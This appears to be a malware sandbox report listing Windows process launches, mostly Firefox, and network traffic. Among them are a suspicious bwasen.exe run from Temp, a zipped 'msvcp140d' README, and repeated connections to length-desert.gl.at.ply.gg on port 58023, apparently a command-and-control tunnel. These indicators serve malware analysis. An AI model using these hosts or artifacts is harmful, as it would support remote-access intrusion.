"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.18.623577597\1807298629" -childID 17 -isForBrowser -prefsHandle 6748 -prefMapHandle 6020 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5af23d-141e-4135-8c94-6ae3fab50a14} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6780 1b417f96558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.19.1659118458\1508684711" -childID 18 -isForBrowser -prefsHandle 10676 -prefMapHandle 10680 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e4a1e6a-dd5e-4ef3-a995-dbf6b130ecc2} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10668 1b41a434458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.20.88138956\841806580" -childID 19 -isForBrowser -prefsHandle 10636 -prefMapHandle 10640 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fd39539-e7f7-4801-9544-1f44c6309137} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10624 1b41a435058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.21.258634945\22377805" -parentBuildID 20230214051806 -prefsHandle 10596 -prefMapHandle 10508 -prefsLen 31239 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c778dd34-57c1-4e6e-8223-e7fb2acb67b7} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9584 1b417612358 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.22.1880084573\1658561127" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 10400 -prefMapHandle 10404 -prefsLen 31239 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7b3277a-619a-485e-97ad-76b059a5de6c} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10396 1b417612f58 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.23.107117301\1580894880" -childID 20 -isForBrowser -prefsHandle 6240 -prefMapHandle 10640 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08945bc8-118c-46cd-ba43-6c3611a76d73} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10596 1b4187fa958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.24.755640297\1662226265" -childID 21 -isForBrowser -prefsHandle 10416 -prefMapHandle 9496 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {746b2c5f-0fe0-4ba3-9080-57ab79e43790} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9512 1b41671ef58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.25.1103816285\1912108563" -childID 22 -isForBrowser -prefsHandle 9532 -prefMapHandle 9528 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e6d5032-1f2c-43e3-b00b-f49e5cec6834} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 4468 1b41671f858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.26.77904055\1659766009" -childID 23 -isForBrowser -prefsHandle 9312 -prefMapHandle 9308 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31ededc6-0c32-4208-b44c-65dd960d9dc6} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6600 1b417505058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.27.750530060\1054897581" -childID 24 -isForBrowser -prefsHandle 9268 -prefMapHandle 9272 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c5f295d-6b90-4544-b80c-118289e0c65a} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5408 1b411f8ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.28.1493961737\1494003751" -childID 25 -isForBrowser -prefsHandle 9952 -prefMapHandle 9948 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1632f25b-4c99-4975-972d-dde3a20e1416} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9960 1b412795258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.29.1170367946\65131412" -childID 26 -isForBrowser -prefsHandle 9176 -prefMapHandle 9172 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1956cef-7c35-4590-8d54-72e0c7b879bd} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9188 1b412855858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.30.1584596473\2073258953" -childID 27 -isForBrowser -prefsHandle 9052 -prefMapHandle 9764 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e5e532-9e62-4fc1-8987-cda261b1ff23} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9768 1b40cb17258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.31.1754350664\1019937785" -childID 28 -isForBrowser -prefsHandle 8904 -prefMapHandle 8900 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7bced06-4817-4269-9f4f-693e9e8a0097} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9872 1b41684d558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.32.111082702\550190362" -childID 29 -isForBrowser -prefsHandle 8148 -prefMapHandle 8628 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fb0edc2-9bf5-43d2-b3c2-abecebed8007} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 8140 1b40db12d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.33.115435006\2086328760" -childID 30 -isForBrowser -prefsHandle 9916 -prefMapHandle 9920 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ae60877-eee8-423c-943f-bc7db3efdcc4} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9908 1b415310358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.34.1770714152\2067733788" -childID 31 -isForBrowser -prefsHandle 8916 -prefMapHandle 9772 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a32b5c0-758f-4fcb-8077-79a196b41977} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9160 1b416ce7c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.35.331734646\241953850" -childID 32 -isForBrowser -prefsHandle 5392 -prefMapHandle 5644 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b2fd888-b2b8-4bc2-9d2a-b6f3a8b6a77c} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10068 1b41a434758 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.36.1561170832\455959865" -childID 33 -isForBrowser -prefsHandle 6920 -prefMapHandle 9752 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15ffa295-7282-4cc9-a45e-f8966f057329} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5968 1b4170bea58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.37.2030566780\737832275" -childID 34 -isForBrowser -prefsHandle 8028 -prefMapHandle 8016 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {495b63ba-4568-4f64-9bf6-cbb3c5832f26} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5448 1b41624d258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.38.1663423078\52857532" -childID 35 -isForBrowser -prefsHandle 7924 -prefMapHandle 7928 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e35e22a-efc9-4889-8fed-1da18b1a7723} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 8460 1b417503858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.39.643743037\1093064421" -childID 36 -isForBrowser -prefsHandle 8324 -prefMapHandle 9976 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68eb4973-103a-4733-90b7-03e7dd9fba40} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 8668 1b41339ec58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.40.146683260\1141717983" -childID 37 -isForBrowser -prefsHandle 8856 -prefMapHandle 9032 -prefsLen 31326 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ec5f013-fa17-4724-851b-4ae72b5c2dfc} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10136 1b416ce6758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.41.2008744242\57359006" -childID 38 -isForBrowser -prefsHandle 8128 -prefMapHandle 8132 -prefsLen 31326 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {edafceda-cdf6-45fe-a1ff-1e5fbb1cbf65} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5252 1b41a30da58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.42.1280163165\700038039" -childID 39 -isForBrowser -prefsHandle 8152 -prefMapHandle 8688 -prefsLen 31326 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fad5a45-a13b-4433-b056-db4d24043ff2} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 4852 1b417f07558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.43.8071369\1123286333" -childID 40 -isForBrowser -prefsHandle 9000 -prefMapHandle 8120 -prefsLen 31326 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de306a57-8a92-4fb5-8aa2-780b1c47a9f5} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 7840 1b41530fa58 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.44.446971539\760241685" -childID 41 -isForBrowser -prefsHandle 10176 -prefMapHandle 6620 -prefsLen 31326 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11669658-86bf-44d4-9fb2-a730d26e8402} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 3692 1b417485558 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.45.676412680\1180911545" -childID 42 -isForBrowser -prefsHandle 9716 -prefMapHandle 9636 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e864c1a-8d30-494f-996e-40d9ba040216} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9644 1b41aa99d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.46.2136688491\879240639" -childID 43 -isForBrowser -prefsHandle 9500 -prefMapHandle 9444 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df658bce-84bf-4750-82e5-d3e8822605c1} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 8292 1b419e14058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.47.1459620937\1169508945" -childID 44 -isForBrowser -prefsHandle 8236 -prefMapHandle 5568 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9956c01b-c5c7-475d-84d2-753a7829a10b} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 7860 1b41762f158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.48.1691127821\1255088181" -childID 45 -isForBrowser -prefsHandle 10592 -prefMapHandle 10576 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6452dd73-8018-4a43-8eed-cd23f8e8f160} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 10580 1b418e12658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.49.1772764191\993100671" -childID 46 -isForBrowser -prefsHandle 10572 -prefMapHandle 10544 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7477fc49-5f50-436f-b422-8645f6e32d69} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 4712 1b412795258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.50.989869225\657116465" -childID 47 -isForBrowser -prefsHandle 5988 -prefMapHandle 9992 -prefsLen 31366 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {177fecc4-a598-4f50-9e11-85d620b2b651} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 9980 1b416397258 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_msvcp140d.zip\README.txt

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Users\Admin\AppData\Local\Temp\bwasen.exe

"C:\Users\Admin\AppData\Local\Temp\bwasen.exe"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

Network

Country Destination Domain Proto
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
N/A 127.0.0.1:49756 tcp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 44.237.98.207:443 shavar.prod.mozaws.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.120.5.221:443 prod.pocket.prod.cloudops.mozgcp.net tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
N/A 127.0.0.1:49763 tcp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
GB 142.250.187.206:443 redirector.gvt1.com tcp
GB 142.250.187.206:443 redirector.gvt1.com udp
GB 173.194.183.166:443 r1---sn-aigl6ney.gvt1.com tcp
GB 173.194.183.166:443 r1---sn-aigl6ney.gvt1.com udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
BE 2.17.196.177:443 www.bing.com tcp
N/A 224.0.0.251:5353 udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
IN 142.250.193.195:443 id.google.com tcp
IN 142.250.193.195:443 id.google.com tcp
GB 216.58.204.86:443 i.ytimg.com tcp
GB 216.58.204.86:443 i.ytimg.com tcp
GB 216.58.204.86:443 i.ytimg.com tcp
GB 216.58.204.86:443 i.ytimg.com udp
US 8.8.8.8:53 195.193.250.142.in-addr.arpa udp
US 8.8.8.8:53 86.204.58.216.in-addr.arpa udp
GB 216.58.204.78:443 www.youtube.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 216.58.204.78:443 www.youtube.com udp
GB 142.250.179.238:443 play.google.com udp
IN 142.250.193.195:443 id.google.com udp
CZ 104.64.172.89:443 e13362.dscb.akamaiedge.net tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 89.172.64.104.in-addr.arpa udp
NL 40.126.32.76:443 www.tm.v4.a.prd.aadg.akadns.net tcp
US 152.199.23.37:443 aadcdn.msftauth.net tcp
US 8.8.8.8:53 js.monitor.azure.com udp
US 8.8.8.8:53 consentdeliveryfd.azurefd.net udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 mem.gfx.ms udp
BE 2.21.17.194:443 www.microsoft.com tcp
BE 2.21.17.194:443 www.microsoft.com tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
US 13.107.246.64:443 mem.gfx.ms tcp
AU 40.79.173.40:443 onedscolprdaue00.australiaeast.cloudapp.azure.com tcp
AU 40.79.173.40:443 onedscolprdaue00.australiaeast.cloudapp.azure.com tcp
US 20.189.173.26:443 browser.events.data.microsoft.com tcp
GB 143.244.38.136:443 nextdllfiles.b-cdn.net tcp
US 8.8.8.8:53 tg1.aniview.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
GB 142.250.179.234:443 ajax.googleapis.com tcp
GB 142.250.179.234:443 ajax.googleapis.com tcp
FR 52.84.174.61:443 c.pubguru.net tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 142.250.179.234:443 ajax.googleapis.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 207.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 169.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 61.174.84.52.in-addr.arpa udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 track1.aniview.com udp
US 8.8.8.8:53 feed.avplayer.com udp
US 8.8.8.8:53 player.avplayer.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 96.46.186.186:443 track-sc-was.aniview.com tcp
SE 92.123.135.86:443 e16009.dscd.akamaiedge.net tcp
FR 92.122.166.2:443 a1970.dscd.akamai.net tcp
DE 18.193.100.165:443 a3.pubguru.net tcp
DE 18.193.100.165:443 a3.pubguru.net tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
FR 92.122.166.2:443 player.aniview.com tcp
FR 92.122.166.38:443 player.aniview.com tcp
FR 92.122.166.38:443 player.aniview.com udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 38.166.122.92.in-addr.arpa udp
US 173.0.146.6:443 go1sc.aniview.com tcp
GB 142.250.187.238:443 www3.l.google.com tcp
GB 142.250.187.238:443 www3.l.google.com udp
US 8.8.8.8:53 secure.adnxs.com udp
US 8.8.8.8:53 u.openx.net udp
US 8.8.8.8:53 ads.stickyadstv.com udp
BE 64.233.166.155:443 stats.g.doubleclick.net tcp
GB 2.21.188.239:443 e6603.g.akamaiedge.net tcp
US 34.98.64.218:443 u.openx.net tcp
NL 185.89.210.244:443 ib.anycast.adnxs.com tcp
BE 104.68.78.171:443 secure-assets.rubiconproject.com tcp
US 8.8.8.8:53 rtb.openx.net udp
NL 154.57.158.115:443 ads.stickyadstv.com tcp
NL 154.57.158.115:443 ads.stickyadstv.com tcp
BE 64.233.166.155:443 stats.g.doubleclick.net udp
US 34.98.64.218:443 u.openx.net udp
US 8.8.8.8:53 e8960.e2.akamaiedge.net udp
DE 37.252.171.52:443 ib.adnxs.com tcp
US 35.227.252.103:443 rtb.openx.net tcp
US 8.8.8.8:53 eus.rubiconproject.com udp
US 8.8.8.8:53 sync.aniview.com udp
BE 2.21.18.175:443 eus.rubiconproject.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 35.227.252.103:443 rtb.openx.net udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 155.166.233.64.in-addr.arpa udp
US 8.8.8.8:53 218.64.98.34.in-addr.arpa udp
